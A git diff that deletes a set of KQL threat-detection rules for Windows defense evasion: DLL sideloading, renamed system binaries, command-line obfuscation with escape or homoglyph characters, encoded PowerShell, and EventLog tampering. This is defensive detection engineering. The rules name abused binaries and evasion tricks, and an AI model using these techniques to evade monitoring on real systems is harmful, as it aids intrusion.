diff --git a/Defense Evasion/Potential_Chrome_Frame_Helper_DLL_Sideloading.kql b/Defense Evasion/Potential_Chrome_Frame_Helper_DLL_Sideloading.kql
deleted file mode 100644
index 4ca5d408..00000000
--- a/Defense Evasion/Potential_Chrome_Frame_Helper_DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
-// Date: 2022/08/17
-// Level: medium
-// Description: Detects potential DLL sideloading of "chrome_frame_helper.dll"
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\chrome_frame_helper.dll" and (not((FolderPath startswith "C:\\Program Files\\Google\\Chrome\\Application\\" or FolderPath startswith "C:\\Program Files (x86)\\Google\\Chrome\\Application\\"))) and (not(FolderPath contains "\\AppData\\local\\Google\\Chrome\\Application\\"))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Command_Line_Path_Traversal_Evasion_Attempt.kql b/Defense Evasion/Potential_Command_Line_Path_Traversal_Evasion_Attempt.kql
deleted file mode 100644
index 69960a71..00000000
--- a/Defense Evasion/Potential_Command_Line_Path_Traversal_Evasion_Attempt.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/10/26
-// Level: medium
-// Description: Detects potential evasion or obfuscation attempts using bogus path traversal via the commandline
-// Tags: attack.defense_evasion, attack.t1036
-DeviceProcessEvents
-| where (((ProcessCommandLine contains "\\..\\Windows\\" or ProcessCommandLine contains "\\..\\System32\\" or ProcessCommandLine contains "\\..\\..\\") and FolderPath contains "\\Windows\\") or ProcessCommandLine contains ".exe\\..\\") and (not((ProcessCommandLine contains "\\Citrix\\Virtual Smart Card\\Citrix.Authentication.VirtualSmartcard.Launcher.exe\\..\\" or ProcessCommandLine contains "\\Google\\Drive\\googledrivesync.exe\\..\\")))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Commandline_Obfuscation_Using_Escape_Characters.kql b/Defense Evasion/Potential_Commandline_Obfuscation_Using_Escape_Characters.kql
deleted file mode 100644
index cffa5dcf..00000000
--- a/Defense Evasion/Potential_Commandline_Obfuscation_Using_Escape_Characters.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: juju4
-// Date: 2018/12/11
-// Level: medium
-// Description: Detects potential commandline obfuscation using known escape characters
-// Tags: attack.defense_evasion, attack.t1140
-DeviceProcessEvents
-| where ProcessCommandLine contains "h^t^t^p" or ProcessCommandLine contains "h\"t\"t\"p"
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Commandline_Obfuscation_Using_Unicode_Characters.kql b/Defense Evasion/Potential_Commandline_Obfuscation_Using_Unicode_Characters.kql
deleted file mode 100644
index 2dc00551..00000000
--- a/Defense Evasion/Potential_Commandline_Obfuscation_Using_Unicode_Characters.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: frack113, Florian Roth (Nextron Systems)
-// Date: 2022/01/15
-// Level: high
-// Description: Detects potential commandline obfuscation using unicode characters.
-Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.
-
-// Tags: attack.defense_evasion, attack.t1027
-DeviceProcessEvents
-| where (ProcessCommandLine contains "â" or ProcessCommandLine contains "€" or ProcessCommandLine contains "£" or ProcessCommandLine contains "¯" or ProcessCommandLine contains "®" or ProcessCommandLine contains "µ" or ProcessCommandLine contains "¶") or (ProcessCommandLine contains "ˣ" or ProcessCommandLine contains "˪" or ProcessCommandLine contains "ˢ") or (ProcessCommandLine contains "―" or ProcessCommandLine contains "—") or (ProcessCommandLine contains "∕" or ProcessCommandLine contains "⁄")
\ No newline at end of file
diff --git a/Defense Evasion/Potential_DLL_Injection_Or_Execution_Using_Tracker.exe.kql b/Defense Evasion/Potential_DLL_Injection_Or_Execution_Using_Tracker.exe.kql
deleted file mode 100644
index 598a6653..00000000
--- a/Defense Evasion/Potential_DLL_Injection_Or_Execution_Using_Tracker.exe.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Avneet Singh @v3t0_, oscd.community
-// Date: 2020/10/18
-// Level: medium
-// Description: Detects potential DLL injection and execution using "Tracker.exe"
-// Tags: attack.defense_evasion, attack.t1055.001
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " /d " or ProcessCommandLine contains " /c ") and (FolderPath endswith "\\tracker.exe" or ProcessVersionInfoFileDescription =~ "Tracker")) and (not((ProcessCommandLine contains " /ERRORREPORT:PROMPT " or (InitiatingProcessFolderPath endswith "\\Msbuild\\Current\\Bin\\MSBuild.exe" or InitiatingProcessFolderPath endswith "\\Msbuild\\Current\\Bin\\amd64\\MSBuild.exe"))))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_DLL_Sideloading_Of_DBGCORE.DLL.kql b/Defense Evasion/Potential_DLL_Sideloading_Of_DBGCORE.DLL.kql
deleted file mode 100644
index 7d53df8f..00000000
--- a/Defense Evasion/Potential_DLL_Sideloading_Of_DBGCORE.DLL.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
-// Date: 2022/10/25
-// Level: medium
-// Description: Detects DLL sideloading of "dbgcore.dll"
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\dbgcore.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\" or FolderPath startswith "C:\\Program Files\\" or FolderPath startswith "C:\\Windows\\SoftwareDistribution\\" or FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SystemTemp\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\"))) and (not(FolderPath endswith "\\Steam\\bin\\cef\\cef.win7x64\\dbgcore.dll"))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_DLL_Sideloading_Of_DBGHELP.DLL.kql b/Defense Evasion/Potential_DLL_Sideloading_Of_DBGHELP.DLL.kql
deleted file mode 100644
index 85e52e34..00000000
--- a/Defense Evasion/Potential_DLL_Sideloading_Of_DBGHELP.DLL.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
-// Date: 2022/10/25
-// Level: medium
-// Description: Detects DLL sideloading of "dbghelp.dll"
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\dbghelp.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\" or FolderPath startswith "C:\\Program Files\\" or FolderPath startswith "C:\\Windows\\SoftwareDistribution\\" or FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SystemTemp\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\"))) and (not(((FolderPath endswith "\\Anaconda3\\Lib\\site-packages\\vtrace\\platforms\\windll\\amd64\\dbghelp.dll" or FolderPath endswith "\\Anaconda3\\Lib\\site-packages\\vtrace\\platforms\\windll\\i386\\dbghelp.dll") or (FolderPath endswith "\\Epic Games\\Launcher\\Engine\\Binaries\\ThirdParty\\DbgHelp\\dbghelp.dll" or FolderPath endswith "\\Epic Games\\MagicLegends\\x86\\dbghelp.dll"))))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_DLL_Sideloading_Of_Libcurl.DLL_Via_GUP.EXE.kql b/Defense Evasion/Potential_DLL_Sideloading_Of_Libcurl.DLL_Via_GUP.EXE.kql
deleted file mode 100644
index bafb67b9..00000000
--- a/Defense Evasion/Potential_DLL_Sideloading_Of_Libcurl.DLL_Via_GUP.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/05
-// Level: medium
-// Description: Detects potential DLL sideloading of "libcurl.dll" by the "gup.exe" process from an uncommon location
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\libcurl.dll" and InitiatingProcessFolderPath endswith "\\gup.exe") and (not(InitiatingProcessFolderPath endswith "\\Notepad++\\updater\\GUP.exe"))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_DLL_Sideloading_Using_Coregen.exe.kql b/Defense Evasion/Potential_DLL_Sideloading_Using_Coregen.exe.kql
deleted file mode 100644
index 4c46541b..00000000
--- a/Defense Evasion/Potential_DLL_Sideloading_Using_Coregen.exe.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/12/31
-// Level: medium
-// Description: Detect usage of DLL "coregen.exe" (Microsoft CoreCLR Native Image Generator) binary to sideload arbitrary DLLs.
-// Tags: attack.defense_evasion, attack.t1218, attack.t1055
-DeviceImageLoadEvents
-| where InitiatingProcessFolderPath endswith "\\coregen.exe" and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Program Files\\Microsoft Silverlight\\" or FolderPath startswith "C:\\Program Files (x86)\\Microsoft Silverlight\\")))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_DLL_Sideloading_Via_ClassicExplorer32.dll.kql b/Defense Evasion/Potential_DLL_Sideloading_Via_ClassicExplorer32.dll.kql
deleted file mode 100644
index d6f4a3c3..00000000
--- a/Defense Evasion/Potential_DLL_Sideloading_Via_ClassicExplorer32.dll.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/12/13
-// Level: medium
-// Description: Detects potential DLL sideloading using ClassicExplorer32.dll from the Classic Shell software
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\ClassicExplorer32.dll" and (not(FolderPath startswith "C:\\Program Files\\Classic Shell\\"))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_DLL_Sideloading_Via_DeviceEnroller.EXE.kql b/Defense Evasion/Potential_DLL_Sideloading_Via_DeviceEnroller.EXE.kql
deleted file mode 100644
index 7c55658c..00000000
--- a/Defense Evasion/Potential_DLL_Sideloading_Via_DeviceEnroller.EXE.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: @gott_cyber
-// Date: 2022/08/29
-// Level: medium
-// Description: Detects the use of the PhoneDeepLink parameter to potentially sideload a DLL file that does not exist. This non-existent DLL file is named "ShellChromeAPI.dll".
-Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter
-
-// Tags: attack.defense_evasion, attack.t1574.002
-DeviceProcessEvents
-| where ProcessCommandLine contains "/PhoneDeepLink" and (FolderPath endswith "\\deviceenroller.exe" or ProcessVersionInfoOriginalFileName =~ "deviceenroller.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Potential_DLL_Sideloading_Via_JsSchHlp.kql b/Defense Evasion/Potential_DLL_Sideloading_Via_JsSchHlp.kql
deleted file mode 100644
index 4d8a43ae..00000000
--- a/Defense Evasion/Potential_DLL_Sideloading_Via_JsSchHlp.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/12/14
-// Level: medium
-// Description: Detects potential DLL sideloading using JUSTSYSTEMS Japanese word processor
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\JSESPR.dll" and (not(FolderPath startswith "C:\\Program Files\\Common Files\\Justsystem\\JsSchHlp\\"))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_DLL_Sideloading_Via_VMware_Xfer.kql b/Defense Evasion/Potential_DLL_Sideloading_Via_VMware_Xfer.kql
deleted file mode 100644
index 418f4c38..00000000
--- a/Defense Evasion/Potential_DLL_Sideloading_Via_VMware_Xfer.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/02
-// Level: high
-// Description: Detects loading of a DLL by the VMware Xfer utility from the non-default directory which may be an attempt to sideload arbitrary DLL
-// Tags: attack.defense_evasion, attack.t1574.002
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\glib-2.0.dll" and InitiatingProcessFolderPath endswith "\\VMwareXferlogs.exe") and (not(FolderPath startswith "C:\\Program Files\\VMware\\"))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_DLL_Sideloading_Via_comctl32.dll.kql b/Defense Evasion/Potential_DLL_Sideloading_Via_comctl32.dll.kql
deleted file mode 100644
index 05e33118..00000000
--- a/Defense Evasion/Potential_DLL_Sideloading_Via_comctl32.dll.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Subhash Popuri (@pbssubhash)
-// Date: 2022/12/16
-// Level: high
-// Description: Detects potential DLL sideloading using comctl32.dll to obtain system privileges
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\comctl32.dll" and (FolderPath startswith "C:\\Windows\\System32\\logonUI.exe.local\\" or FolderPath startswith "C:\\Windows\\System32\\werFault.exe.local\\" or FolderPath startswith "C:\\Windows\\System32\\consent.exe.local\\" or FolderPath startswith "C:\\Windows\\System32\\narrator.exe.local\\" or FolderPath startswith "C:\\windows\\system32\\wermgr.exe.local\\")
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Defense_Evasion_Via_Binary_Rename.kql b/Defense Evasion/Potential_Defense_Evasion_Via_Binary_Rename.kql
deleted file mode 100644
index e1088872..00000000
--- a/Defense Evasion/Potential_Defense_Evasion_Via_Binary_Rename.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Matthew Green @mgreen27, Ecco, James Pemberton @4A616D6573, oscd.community, Andreas Hunkeler (@Karneades)
-// Date: 2019/06/15
-// Level: medium
-// Description: Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.
-// Tags: attack.defense_evasion, attack.t1036.003
-DeviceProcessEvents
-| where (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "CONHOST.EXE", "7z.exe", "WinRAR.exe", "wevtutil.exe", "net.exe", "net1.exe", "netsh.exe", "InstallUtil.exe")) and (not((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\conhost.exe" or FolderPath endswith "\\7z.exe" or FolderPath endswith "\\WinRAR.exe" or FolderPath endswith "\\wevtutil.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\netsh.exe" or FolderPath endswith "\\InstallUtil.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Defense_Evasion_Via_Rename_Of_Highly_Relevant_Binaries.kql b/Defense Evasion/Potential_Defense_Evasion_Via_Rename_Of_Highly_Relevant_Binaries.kql
deleted file mode 100644
index 9b1bd1ff..00000000
--- a/Defense Evasion/Potential_Defense_Evasion_Via_Rename_Of_Highly_Relevant_Binaries.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Matthew Green - @mgreen27, Florian Roth (Nextron Systems), frack113
-// Date: 2019/06/15
-// Level: high
-// Description: Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.
-// Tags: attack.defense_evasion, attack.t1036.003, car.2013-05-009
-DeviceProcessEvents
-| where (ProcessVersionInfoFileDescription =~ "Execute processes remotely" or ProcessVersionInfoProductName =~ "Sysinternals PsExec" or (ProcessVersionInfoFileDescription startswith "Windows PowerShell" or ProcessVersionInfoFileDescription startswith "pwsh") or (ProcessVersionInfoOriginalFileName in~ ("certutil.exe", "cmstp.exe", "cscript.exe", "mshta.exe", "msiexec.exe", "powershell_ise.exe", "powershell.exe", "psexec.c", "psexec.exe", "psexesvc.exe", "pwsh.dll", "reg.exe", "regsvr32.exe", "rundll32.exe", "WerMgr", "wmic.exe", "wscript.exe"))) and (not((FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cmstp.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\psexec.exe" or FolderPath endswith "\\psexec64.exe" or FolderPath endswith "\\PSEXESVC.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wermgr.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Defense_Evasion_Via_Right-to-Left_Override.kql b/Defense Evasion/Potential_Defense_Evasion_Via_Right-to-Left_Override.kql
deleted file mode 100644
index 1a7fb871..00000000
--- a/Defense Evasion/Potential_Defense_Evasion_Via_Right-to-Left_Override.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Micah Babinski, @micahbabinski
-// Date: 2023/02/15
-// Level: high
-// Description: Detects the presence of the "u202+E" character, which causes a terminal, browser, or operating system to render text in a right-to-left sequence.
-This is used as an obfuscation and masquerading techniques.
-
-// Tags: attack.defense_evasion, attack.t1036.002
-DeviceProcessEvents
-| where ProcessCommandLine contains "‮"
\ No newline at end of file
diff --git a/Defense Evasion/Potential_EACore.DLL_Sideloading.kql b/Defense Evasion/Potential_EACore.DLL_Sideloading.kql
deleted file mode 100644
index f843422e..00000000
--- a/Defense Evasion/Potential_EACore.DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/08/03
-// Level: high
-// Description: Detects potential DLL sideloading of "EACore.dll"
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\EACore.dll" and (not((FolderPath startswith "C:\\Program Files\\Electronic Arts\\EA Desktop\\" and (InitiatingProcessFolderPath contains "C:\\Program Files\\Electronic Arts\\EA Desktop\\" and InitiatingProcessFolderPath contains "\\EACoreServer.exe"))))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Edputil.DLL_Sideloading.kql b/Defense Evasion/Potential_Edputil.DLL_Sideloading.kql
deleted file mode 100644
index fa643858..00000000
--- a/Defense Evasion/Potential_Edputil.DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/06/09
-// Level: high
-// Description: Detects potential DLL sideloading of "edputil.dll"
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\edputil.dll" and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C\\Windows\\WinSxS\\")))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Encoded_PowerShell_Patterns_In_CommandLine.kql b/Defense Evasion/Potential_Encoded_PowerShell_Patterns_In_CommandLine.kql
deleted file mode 100644
index a07c661e..00000000
--- a/Defense Evasion/Potential_Encoded_PowerShell_Patterns_In_CommandLine.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton
-// Date: 2020/10/11
-// Level: low
-// Description: Detects specific combinations of encoding methods in PowerShell via the commandline
-// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (((ProcessCommandLine contains "ToInt" or ProcessCommandLine contains "ToDecimal" or ProcessCommandLine contains "ToByte" or ProcessCommandLine contains "ToUint" or ProcessCommandLine contains "ToSingle" or ProcessCommandLine contains "ToSByte") and (ProcessCommandLine contains "ToChar" or ProcessCommandLine contains "ToString" or ProcessCommandLine contains "String")) or ((ProcessCommandLine contains "char" and ProcessCommandLine contains "join") or (ProcessCommandLine contains "split" and ProcessCommandLine contains "join")))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_EventLog_File_Location_Tampering.kql b/Defense Evasion/Potential_EventLog_File_Location_Tampering.kql
deleted file mode 100644
index f6bdd5e5..00000000
--- a/Defense Evasion/Potential_EventLog_File_Location_Tampering.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: D3F7A5105
-// Date: 2023/01/02
-// Level: high
-// Description: Detects tampering with EventLog service "file" key. In order to change the default location of an Evtx file. This technique is used to tamper with log collection and alerting
-// Tags: attack.defense_evasion, attack.t1562.002
-DeviceRegistryEvents
-| where (RegistryKey contains "\\SYSTEM\\CurrentControlSet\\Services\\EventLog" and RegistryKey endswith "\\File") and (not(RegistryValueData contains "\\System32\\Winevt\\Logs\\"))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Fake_Instance_Of_Hxtsr.EXE_Executed.kql b/Defense Evasion/Potential_Fake_Instance_Of_Hxtsr.EXE_Executed.kql
deleted file mode 100644
index 4f50439f..00000000
--- a/Defense Evasion/Potential_Fake_Instance_Of_Hxtsr.EXE_Executed.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Sreeman
-// Date: 2020/04/17
-// Level: medium
-// Description: HxTsr.exe is a Microsoft compressed executable file called Microsoft Outlook Communications.
-HxTsr.exe is part of Outlook apps, because it resides in a hidden "WindowsApps" subfolder of "C:\Program Files".
-Any instances of hxtsr.exe not in this folder may be malware camouflaging itself as HxTsr.exe
-
-// Tags: attack.defense_evasion, attack.t1036
-DeviceProcessEvents
-| where FolderPath endswith "\\hxtsr.exe" and (not((FolderPath contains ":\\program files\\windowsapps\\microsoft.windowscommunicationsapps_" and FolderPath endswith "\\hxtsr.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_File_Download_Via_MS-AppInstaller_Protocol_Handler.kql b/Defense Evasion/Potential_File_Download_Via_MS-AppInstaller_Protocol_Handler.kql
deleted file mode 100644
index 45a8fd0c..00000000
--- a/Defense Evasion/Potential_File_Download_Via_MS-AppInstaller_Protocol_Handler.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel
-// Date: 2023/11/09
-// Level: medium
-// Description: Detects usage of the "ms-appinstaller" protocol handler via command line to potentially download arbitrary files via AppInstaller.EXE
-The downloaded files are temporarly stored in ":\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\"
-
-// Tags: attack.defense_evasion, attack.execution, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains "ms-appinstaller://" and ProcessCommandLine contains "source=") and ProcessCommandLine contains "http"
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Goopdate.DLL_Sideloading.kql b/Defense Evasion/Potential_Goopdate.DLL_Sideloading.kql
deleted file mode 100644
index 27f1e8dc..00000000
--- a/Defense Evasion/Potential_Goopdate.DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/15
-// Level: medium
-// Description: Detects potential DLL sideloading of "goopdate.dll", a DLL used by googleupdate.exe
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\goopdate.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\" or FolderPath startswith "C:\\Program Files\\"))) and (not(((FolderPath contains "\\AppData\\Local\\Temp\\GUM" and FolderPath contains ".tmp\\goopdate.dll") and (InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\GUM" and InitiatingProcessFolderPath contains ".tmp\\Dropbox"))))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Hidden_Directory_Creation_Via_NTFS_INDEX_ALLOCATION_Stream.kql b/Defense Evasion/Potential_Hidden_Directory_Creation_Via_NTFS_INDEX_ALLOCATION_Stream.kql
deleted file mode 100644
index fbde79fa..00000000
--- a/Defense Evasion/Potential_Hidden_Directory_Creation_Via_NTFS_INDEX_ALLOCATION_Stream.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Scoubi (@ScoubiMtl)
-// Date: 2023/10/09
-// Level: medium
-// Description: Detects the creation of hidden file/folder with the "::$index_allocation" stream. Which can be used as a technique to prevent access to folder and files from tooling such as "explorer.exe" and "powershell.exe"
-
-// Tags: attack.defense_evasion, attack.t1564.004
-DeviceFileEvents
-| where FolderPath contains "::$index_allocation"
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Hidden_Directory_Creation_Via_NTFS_INDEX_ALLOCATION_Stream_-_CLI.kql b/Defense Evasion/Potential_Hidden_Directory_Creation_Via_NTFS_INDEX_ALLOCATION_Stream_-_CLI.kql
deleted file mode 100644
index 879b3fc5..00000000
--- a/Defense Evasion/Potential_Hidden_Directory_Creation_Via_NTFS_INDEX_ALLOCATION_Stream_-_CLI.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Scoubi (@ScoubiMtl)
-// Date: 2023/10/09
-// Level: medium
-// Description: Detects command line containing reference to the "::$index_allocation" stream, which can be used as a technique to prevent access to folders or files from tooling such as "explorer.exe" or "powershell.exe"
-
-// Tags: attack.defense_evasion, attack.t1564.004
-DeviceProcessEvents
-| where ProcessCommandLine contains "::$index_allocation"
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Homoglyph_Attack_Using_Lookalike_Characters.kql b/Defense Evasion/Potential_Homoglyph_Attack_Using_Lookalike_Characters.kql
deleted file mode 100644
index 196cf067..00000000
--- a/Defense Evasion/Potential_Homoglyph_Attack_Using_Lookalike_Characters.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Micah Babinski, @micahbabinski
-// Date: 2023/05/07
-// Level: medium
-// Description: Detects the presence of unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters.
-This is used as an obfuscation and masquerading techniques. Only "perfect" homoglyphs are included; these are characters that
-are indistinguishable from ASCII characters and thus may make excellent candidates for homoglyph attack characters.
-
-// Tags: attack.defense_evasion, attack.t1036, attack.t1036.003
-DeviceProcessEvents
-| where (ProcessCommandLine contains "а" or ProcessCommandLine contains "е" or ProcessCommandLine contains "о" or ProcessCommandLine contains "р" or ProcessCommandLine contains "с" or ProcessCommandLine contains "х" or ProcessCommandLine contains "ѕ" or ProcessCommandLine contains "і" or ProcessCommandLine contains "ӏ" or ProcessCommandLine contains "ј" or ProcessCommandLine contains "һ" or ProcessCommandLine contains "ԁ" or ProcessCommandLine contains "ԛ" or ProcessCommandLine contains "ԝ" or ProcessCommandLine contains "ο") or (ProcessCommandLine contains "А" or ProcessCommandLine contains "В" or ProcessCommandLine contains "Е" or ProcessCommandLine contains "К" or ProcessCommandLine contains "М" or ProcessCommandLine contains "Н" or ProcessCommandLine contains "О" or ProcessCommandLine contains "Р" or ProcessCommandLine contains "С" or ProcessCommandLine contains "Т" or ProcessCommandLine contains "Х" or ProcessCommandLine contains "Ѕ" or ProcessCommandLine contains "І" or ProcessCommandLine contains "Ј" or ProcessCommandLine contains "Ү" or ProcessCommandLine contains "Ӏ" or ProcessCommandLine contains "Ԍ" or ProcessCommandLine contains "Ԛ" or ProcessCommandLine contains "Ԝ" or ProcessCommandLine contains "Α" or ProcessCommandLine contains "Β" or ProcessCommandLine contains "Ε" or ProcessCommandLine contains "Ζ" or ProcessCommandLine contains "Η" or ProcessCommandLine contains "Ι" or ProcessCommandLine
contains "Κ" or ProcessCommandLine contains "Μ" or ProcessCommandLine contains "Ν" or ProcessCommandLine contains "Ο" or ProcessCommandLine contains "Ρ" or ProcessCommandLine contains "Τ" or ProcessCommandLine contains "Υ" or ProcessCommandLine contains "Χ")
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Homoglyph_Attack_Using_Lookalike_Characters_in_Filename.kql b/Defense Evasion/Potential_Homoglyph_Attack_Using_Lookalike_Characters_in_Filename.kql
deleted file mode 100644
index 41664742..00000000
--- a/Defense Evasion/Potential_Homoglyph_Attack_Using_Lookalike_Characters_in_Filename.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Micah Babinski, @micahbabinski
-// Date: 2023/05/08
-// Level: medium
-// Description: Detects the presence of unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters.
-This is used as an obfuscation and masquerading techniques. Only "perfect" homoglyphs are included; these are characters that
-are indistinguishable from ASCII characters and thus may make excellent candidates for homoglyph attack characters.
-
-// Tags: attack.defense_evasion, attack.t1036, attack.t1036.003
-DeviceFileEvents
